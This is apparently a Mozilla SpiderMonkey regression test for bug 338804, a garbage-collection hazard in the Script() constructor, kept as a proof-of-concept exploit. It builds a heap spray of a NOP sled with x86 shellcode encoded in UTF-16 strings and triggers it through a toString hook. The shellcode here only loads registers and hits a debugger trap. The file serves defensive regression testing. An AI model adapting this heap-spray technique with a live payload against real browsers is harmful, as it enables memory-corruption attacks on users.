/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
//-----------------------------------------------------------------------------
var BUGNUMBER = 338804;
var summary = 'GC hazards in constructor functions';
// The harness can only observe a crash here: nothing in this file ever
// reassigns `actual`, so reaching reportCompare() at the bottom is the
// pass condition.
var expect = 'No Crash';
var actual = expect;
printBugNumber(BUGNUMBER);
printStatus(summary);
printStatus('Uses Intel Assembly');
// <script>
// SpiderMonkey Script() GC hazard proof-of-concept (bug 338804), kept as a
// regression test. The payload built by createPayload() is a NOP sled ending
// in int3, so a hijacked instruction pointer traps instead of executing
// anything further; the test passes simply by reaching reportCompare()
// without crashing.
//
// scale: number of strings allocated per fillHeap() pass, tuned empirically
// per engine build (no principled derivation):
// BonEcho/2.0a2: 3000
// Firefox/1.5.0.4: 2000
//
// `rooter` receives the array of allocated strings in fillHeap(); `scale`
// is the per-pass allocation count documented in the comment above.
var rooter;
var scale = 2000;
exploit();
/*
if(typeof(setTimeout) != "undefined") {
setTimeout(exploit, 2000);
} else {
exploit();
}
*/
/**
 * Drive the Script() constructor twice with an object whose toString hook
 * is fillHeap(), so the heap is churned while the constructor is mid-way
 * through converting its argument (presumably the GC hazard under test).
 *
 * Script() is not a standard constructor; on engines that lack it the test
 * prints a skip message and returns without doing anything else.
 */
function exploit() {
  if (typeof Script == 'undefined') {
    print('Test skipped. Script not defined.');
    return;
  }
  // Two passes: the second one runs against a heap the first already filled.
  for (var pass = 0; pass < 2; pass++) {
    Script({ toString: fillHeap });
  }
}
/**
 * Build the string whose in-memory bytes form the payload.
 *
 * Each UTF-16 code unit \u9090 holds two 0x90 (x86 NOP) bytes; nine
 * doublings give 512 units, i.e. a 1024-byte NOP sled. The tail decodes,
 * read as little-endian byte pairs, to
 *   B8 ED FE AD DE   mov eax, 0xdeadfeed
 *   89 C3            mov ebx, eax
 *   89 C1            mov ecx, eax
 *   89 C2            mov edx, eax
 *   CC               int3
 * int3 is a debugger trap, so a redirected instruction pointer stops here
 * with recognisable register values rather than executing anything further.
 *
 * @returns {string} 518 code units: the sled followed by the tail.
 */
function createPayload() {
  var sled = "\u9090";
  var doublings = 9;
  while (doublings-- > 0) {
    sled += sled;
  }
  var tail = "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
  return sled + tail;
}
/**
 * toString hook handed to Script(): allocate 2*scale strings and keep them
 * reachable through the global `rooter` array (the name suggests this is
 * meant to keep them alive across any GC the constructor triggers).
 *
 * The first `scale` entries are ever-growing concatenations of the payload
 * (entry i holds i+1 copies); the remaining `scale` entries are the payload
 * with the index appended.
 *
 * @returns {string} always "", so Script() receives an empty source.
 */
function fillHeap() {
  rooter = [];
  var payload = createPayload();
  var limit = scale * 2;
  var chunk = "";
  var n = 0;
  while (n < scale) {
    chunk += payload;
    rooter[n] = chunk;
    n++;
  }
  while (n < limit) {
    rooter[n] = payload + n;
    n++;
  }
  return "";
}
// </script>
// Reached only if both Script() calls returned without crashing; `actual`
// is never changed, so this always compares 'No Crash' with 'No Crash'.
reportCompare(expect, actual, summary);